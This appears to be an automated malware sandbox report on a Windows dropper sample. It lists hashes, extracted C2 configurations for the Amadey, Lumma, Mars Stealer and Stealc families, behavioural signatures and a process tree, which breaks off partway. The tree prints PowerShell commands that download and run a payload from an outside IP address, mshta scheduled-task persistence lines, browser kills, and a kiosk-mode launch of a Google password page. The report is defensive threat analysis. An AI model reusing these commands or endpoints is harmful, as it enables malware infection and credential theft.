Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    17/03/2025, 02:47

General

  • Target

    53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe

  • Size

    2.1MB

  • MD5

    d9f00ea479721f7581810bda98dca097

  • SHA1

    0b438eab56eb426d68bdeb2bd7c6f69af19daca6

  • SHA256

    53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1

  • SHA512

    af216b63003175ac1a4a135a242b2b26a31fd49dc9988f822a04a920fb47c27961eeb481bc8bc1c4c25fc9e09f407c7e0ae079210481c515442525707773af55

  • SSDEEP

    49152:JEESzuUhMGOiuMWTSby13yX9FIgn3ITa02qmF:JQBbHWTr1493Y+IU

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

marsstealer

Botnet

Default

C2

ctrlgem.xyz/gate.php

Extracted

Family

lumma

C2

https://gunrightsp.run/api

https://caliberc.today/api

https://pistolpra.bet/api

https://weaponwo.life/api

https://armamenti.world/api

https://selfdefens.bet/api

https://targett.top/api

https://armoryarch.shop/api

https://blackeblast.run/api

https://kbracketba.shop/api

https://featureccus.shop/api

https://mrodularmall.top/api

https://jowinjoinery.icu/api

https://legenassedk.top/api

https://htardwarehu.icu/api

https://cjlaspcorne.icu/api

https://bugildbett.top/api

https://latchclan.shop/api

https://codxefusion.top/api

https://hardswarehub.today/api

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

lumma

C2

https://codxefusion.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Mars Stealer

    An infostealer written in C++ based on other infostealers.

  • Marsstealer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 27 IoCs
  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 44 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 62 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe
    "C:\Users\Admin\AppData\Local\Temp\53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2520
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2996
      • C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe
        "C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1052
      • C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe
        "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        PID:1028
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          PID:896
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 5
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2504
      • C:\Users\Admin\AppData\Local\Temp\10238250101\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\10238250101\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          PID:840
          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:1600
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1964
          • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1188
            • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2788
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 1012
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1996
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 512
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:2192
          • C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
            "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:2204
            • C:\Windows\SysWOW64\SCHTASKS.exe
              SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2876
          • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
            "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
            5⤵
            • Executes dropped EXE
            PID:1320
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 1320 -s 36
              6⤵
              • Loads dropped DLL
              PID:1132
          • C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
            5⤵
            • Executes dropped EXE
            PID:288
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 288 -s 36
              6⤵
              • Loads dropped DLL
              PID:540
          • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
            "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1352
            • C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
              "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2768
          • C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe
            "C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"
            5⤵
            • Executes dropped EXE
            PID:3184
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 3184 -s 36
              6⤵
              • Loads dropped DLL
              PID:3248
          • C:\Users\Admin\AppData\Local\Temp\10030660101\kollfdsf.exe
            "C:\Users\Admin\AppData\Local\Temp\10030660101\kollfdsf.exe"
            5⤵
            • Executes dropped EXE
            PID:3844
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 3844 -s 36
              6⤵
                PID:3872
            • C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe
              "C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3688
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"
                6⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3896
            • C:\Users\Admin\AppData\Local\Temp\10030750101\334c4d4149.exe
              "C:\Users\Admin\AppData\Local\Temp\10030750101\334c4d4149.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3132
              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                "C:\Users\Admin\AppData\Local\Temp\10030750101\334c4d4149.exe"
                6⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2820
        • C:\Users\Admin\AppData\Local\Temp\10238500101\36407e4594.exe
          "C:\Users\Admin\AppData\Local\Temp\10238500101\36407e4594.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:620
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c schtasks /create /tn DTxdJmacVn4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\cfGQjUnDE.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1724
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn DTxdJmacVn4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\cfGQjUnDE.hta" /sc minute /mo 25 /ru "Admin" /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2124
          • C:\Windows\SysWOW64\mshta.exe
            mshta C:\Users\Admin\AppData\Local\Temp\cfGQjUnDE.hta
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:924
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1680
              • C:\Users\Admin\AppData\Local\Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE
                "C:\Users\Admin\AppData\Local\Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:2828
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Local\Temp\10238510121\am_no.cmd" "
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            4⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2732
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:880
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:600
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2176
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2172
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:380
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2132
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "FkGRumaqy0o" /tr "mshta \"C:\Temp\ply7PbHuL.hta\"" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1764
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\ply7PbHuL.hta"
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:2204
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2408
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:1004
        • C:\Users\Admin\AppData\Local\Temp\10238890101\7c26c6a0f8.exe
          "C:\Users\Admin\AppData\Local\Temp\10238890101\7c26c6a0f8.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:1916
        • C:\Users\Admin\AppData\Local\Temp\10238900101\a732227be0.exe
          "C:\Users\Admin\AppData\Local\Temp\10238900101\a732227be0.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:620
          • C:\Users\Admin\AppData\Local\Temp\GGM65FE7W5E2IVW6D.exe
            "C:\Users\Admin\AppData\Local\Temp\GGM65FE7W5E2IVW6D.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            PID:2008
        • C:\Users\Admin\AppData\Local\Temp\10238910101\df0bb5d7c6.exe
          "C:\Users\Admin\AppData\Local\Temp\10238910101\df0bb5d7c6.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2200
        • C:\Users\Admin\AppData\Local\Temp\10238920101\5c15ee7bad.exe
          "C:\Users\Admin\AppData\Local\Temp\10238920101\5c15ee7bad.exe"
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1500
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM firefox.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:580
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM chrome.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2620
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM msedge.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2480
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM opera.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2056
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM brave.exe /T
            4⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2732
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
            4⤵
              PID:1604
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                5⤵
                • Checks processor information in registry
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:1596
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.0.1706974222\1492814891" -parentBuildID 20221007134813 -prefsHandle 1228 -prefMapHandle 1188 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb824720-633a-44ac-ac32-01617b5ea48b} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 1304 115dae58 gpu
                  6⤵
                    PID:2864
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.1.1822713252\1331520904" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {73bb5d60-ded1-491e-b9cb-5aa0dc826419} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 1520 e73658 socket
                    6⤵
                      PID:2136
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.2.1057527792\309890349" -childID 1 -isForBrowser -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2738483-4854-4c69-91f7-e92a12461798} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 2388 1a0c0c58 tab
                      6⤵
                        PID:1736
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.3.1074235565\715250842" -childID 2 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dcf5e9c-a023-4ba0-886e-3e507f9f1dd2} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 2904 1d913b58 tab
                        6⤵
                          PID:400
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.4.324165368\339859945" -childID 3 -isForBrowser -prefsHandle 3412 -prefMapHandle 3044 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c994fb06-730a-4258-906d-72c715d7e9fb} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 3656 204fb758 tab
                          6⤵
                            PID:3400
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.5.766463998\1933176592" -childID 4 -isForBrowser -prefsHandle 3776 -prefMapHandle 3780 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0bdbf4f-498e-42af-8190-e5c9cf00de59} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 3764 1edeab58 tab
                            6⤵
                              PID:3412
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.6.330813321\2072844158" -childID 5 -isForBrowser -prefsHandle 3960 -prefMapHandle 3964 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ac8a6ef-a4b0-49ba-a791-38808e975599} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 3948 1eded858 tab
                              6⤵
                                PID:3428
                        • C:\Users\Admin\AppData\Local\Temp\10238930101\2331254737.exe
                          "C:\Users\Admin\AppData\Local\Temp\10238930101\2331254737.exe"
                          3⤵
                          • Modifies Windows Defender DisableAntiSpyware settings
                          • Modifies Windows Defender Real-time Protection settings
                          • Modifies Windows Defender TamperProtection settings
                          • Modifies Windows Defender notification settings
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Windows security modification
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3836
                        • C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe
                          "C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe"
                          3⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          PID:3408
                          • C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe
                            "C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe"
                            4⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3444
                        • C:\Users\Admin\AppData\Local\Temp\10238950101\e80c7de81f.exe
                          "C:\Users\Admin\AppData\Local\Temp\10238950101\e80c7de81f.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:2480
                        • C:\Users\Admin\AppData\Local\Temp\10238960101\cbe223688e.exe
                          "C:\Users\Admin\AppData\Local\Temp\10238960101\cbe223688e.exe"
                          3⤵
